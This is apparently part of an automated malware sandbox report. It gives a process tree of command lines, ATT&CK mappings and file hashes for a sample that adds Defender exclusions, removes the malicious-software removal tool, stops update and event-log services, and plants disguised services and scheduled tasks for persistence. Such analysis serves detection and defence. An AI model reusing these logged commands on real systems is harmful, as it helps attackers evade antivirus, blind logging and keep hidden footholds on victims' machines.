    cmd:  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    sigs: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory

[5] C:\Windows\system32\cmd.exe (PID 268)
    cmd:  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

[6] C:\Windows\system32\wusa.exe (PID 1104)
    cmd:  wusa /uninstall /kb:890830 /quiet /norestart
    sigs: Drops file in Windows directory

[5] C:\Windows\system32\sc.exe (PID 1796)
    cmd:  C:\Windows\system32\sc.exe stop UsoSvc
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 1772)
    cmd:  C:\Windows\system32\sc.exe stop WaaSMedicSvc
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 2964)
    cmd:  C:\Windows\system32\sc.exe stop wuauserv
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 1864)
    cmd:  C:\Windows\system32\sc.exe stop bits
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 2084)
    cmd:  C:\Windows\system32\sc.exe stop dosvc
    sigs: Launches sc.exe

[5] C:\Windows\system32\powercfg.exe (PID 2700)
    cmd:  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

[5] C:\Windows\system32\powercfg.exe (PID 2244)
    cmd:  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

[5] C:\Windows\system32\powercfg.exe (PID 1632)
    cmd:  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

[5] C:\Windows\system32\powercfg.exe (PID 2836)
    cmd:  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

[5] C:\Windows\system32\sc.exe (PID 2392)
    cmd:  C:\Windows\system32\sc.exe delete "driverupdate"
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 896)
    cmd:  C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 2672)
    cmd:  C:\Windows\system32\sc.exe stop eventlog
    sigs: Launches sc.exe

[5] C:\Windows\system32\sc.exe (PID 2564)
    cmd:  C:\Windows\system32\sc.exe start "driverupdate"
    sigs: Launches sc.exe
[1] C:\Windows\system32\schtasks.exe (PID 2744)
    cmd:  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\explorer.exe'" /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2876)
    cmd:  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2528)
    cmd:  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2640)
    cmd:  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2788)
    cmd:  schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2548)
    cmd:  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2780)
    cmd:  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 1680)
    cmd:  schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2756)
    cmd:  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2752)
    cmd:  schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\ChainReview\taskhost.exe'" /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2516)
    cmd:  schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2552)
    cmd:  schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2600)
    cmd:  schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2948)
    cmd:  schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2580)
    cmd:  schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 7 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
    sigs: Process spawned unexpected child process; Creates scheduled task(s)

[1] C:\Windows\System32\rundll32.exe (PID 2320)
    cmd:  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

[1] C:\Windows\system32\conhost.exe (PID 1580)
    cmd:  \??\C:\Windows\system32\conhost.exe "1619450566910135647-1410053359-1672108338-1974789323748415161-1532368068-438134973"

[1] C:\ProgramData\VC_redist.x64.exe (PID 3024)
    cmd:  C:\ProgramData\VC_redist.x64.exe
    sigs: Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetThreadContext

[2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 2588)
    cmd:  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    sigs: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Modifies data under HKEY_USERS

[2] C:\Windows\system32\cmd.exe (PID 2816)
    cmd:  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

[3] C:\Windows\system32\wusa.exe (PID 1768)
    cmd:  wusa /uninstall /kb:890830 /quiet /norestart
    sigs: Drops file in Windows directory

[2] C:\Windows\system32\sc.exe (PID 1672)
    cmd:  C:\Windows\system32\sc.exe stop UsoSvc
    sigs: Launches sc.exe

[2] C:\Windows\system32\sc.exe (PID 2520)
    cmd:  C:\Windows\system32\sc.exe stop WaaSMedicSvc
    sigs: Launches sc.exe

[2] C:\Windows\system32\sc.exe (PID 2332)
    cmd:  C:\Windows\system32\sc.exe stop wuauserv
    sigs: Launches sc.exe

[2] C:\Windows\system32\sc.exe (PID 2880)
    cmd:  C:\Windows\system32\sc.exe stop bits
    sigs: Launches sc.exe

[2] C:\Windows\system32\sc.exe (PID 1332)
    cmd:  C:\Windows\system32\sc.exe stop dosvc
    sigs: Launches sc.exe

[2] C:\Windows\system32\powercfg.exe (PID 2948)
    cmd:  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

[2] C:\Windows\system32\powercfg.exe (PID 2200)
    cmd:  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

[2] C:\Windows\system32\powercfg.exe (PID 1444)
    cmd:  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

[2] C:\Windows\system32\powercfg.exe (PID 2232)
    cmd:  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

[2] C:\Windows\system32\conhost.exe (PID 604)
    cmd:  C:\Windows\system32\conhost.exe

[1] C:\Windows\system32\conhost.exe (PID 1700)
    cmd:  \??\C:\Windows\system32\conhost.exe "752025126-628002891-590700494-9858222077262813813564437261862708836546748825"

[1] C:\Windows\system32\conhost.exe (PID 2804)
    cmd:  \??\C:\Windows\system32\conhost.exe "-1411383421-1766168883-15612447962851288551989038863279291050881413273399109812"

[1] C:\Windows\system32\conhost.exe (PID 1040)
    cmd:  \??\C:\Windows\system32\conhost.exe "-855617698-4768896551603069888-8372846494607090741998497141-1585860109-876566517"

[1] C:\Windows\system32\conhost.exe (PID 1116)
    cmd:  \??\C:\Windows\system32\conhost.exe "-9334595191544904511-1150525792830207160-1622713821172833150018428872-1242952810"

[1] C:\Windows\system32\conhost.exe (PID 1488)
    cmd:  \??\C:\Windows\system32\conhost.exe "-1428107885-11538641226024456031794733802115650022-9071930901732239748-527732463"

[1] C:\Windows\system32\conhost.exe (PID 1516)
    cmd:  \??\C:\Windows\system32\conhost.exe "994691572-511111291-1292882474-304860791-1168667435-2060879657353229195201494862"

[1] C:\Windows\system32\LogonUI.exe (PID 2924)
    cmd:  "LogonUI.exe" /flags:0x0

[1] C:\Windows\system32\LogonUI.exe (PID 584)
    cmd:  "LogonUI.exe" /flags:0x1
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- Scheduled Task/Job (1)
- System Services (2)
- Service Execution (2)
Persistence
- Create or Modify System Process (2)
- Windows Service (2)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process (2)
- Windows Service (2)
- Scheduled Task/Job (1)
-
Filesize
905KB
MD5dd1313842898ffaf72d79df643637ded
SHA193a34cb05fdf76869769af09a22711deea44ed28
SHA25681b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f8e15ec4215586e1bc45ab326d416ff7
SHA101b9e2b5e183e35e87cc4004d368223bd121a319
SHA256322fbd8ea8dfe511a367f0bbcf9092ad56bbdfb41ea71fe7ca4d0ec9508695f8
SHA5122ab103dbcb21abcec389d2ba8e5d35d3fec108dfd28e6b07f4a7112de646615c38a365cd4209ac5661025c0174ad5d0834e6ec030487efd25e0422d8b0e35b6e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d46d7ee41c46eb4f295e6dd8580fafe1
SHA19af016e270ffc9b2a06658b1e83b1a490af22bcf
SHA256a5c97aac08de239ff256c0956aa339d72f6f649af463303dcce9270bdd7b72a2
SHA5121d2663cba818c0e1bd56a6ad34d6eabab0181882411ae9b4920f25b0551b399a49e1fe356a2e76b1dd0cc22b1b4ea423276f096fb2b4fc810bf15b975d3597a7
-
Filesize
3.1MB
MD5975eca3793d5ec51d4bd4041fe4bd595
SHA1f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA25650a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89
-
Filesize
2.3MB
MD5280f228a0fd9232c72c66646f5ac8f27
SHA1f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA2566aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA5125e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e
-
Filesize
2.0MB
MD593457a02f578affc1800d7528c5370f3
SHA1fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA5124c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e
-
Filesize
452KB
MD5c4d09d3b3516550ad2ded3b09e28c10c
SHA17a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA25666433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA5122e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2
-
Filesize
162KB
MD533d7a84f8ef67fd005f37142232ae97e
SHA11f560717d8038221c9b161716affb7cd6b14056e
SHA256a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5
-
Filesize
165KB
MD581a45f1a91448313b76d2e6d5308aa7a
SHA10d615343d5de03da03bce52e11b233093b404083
SHA256fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d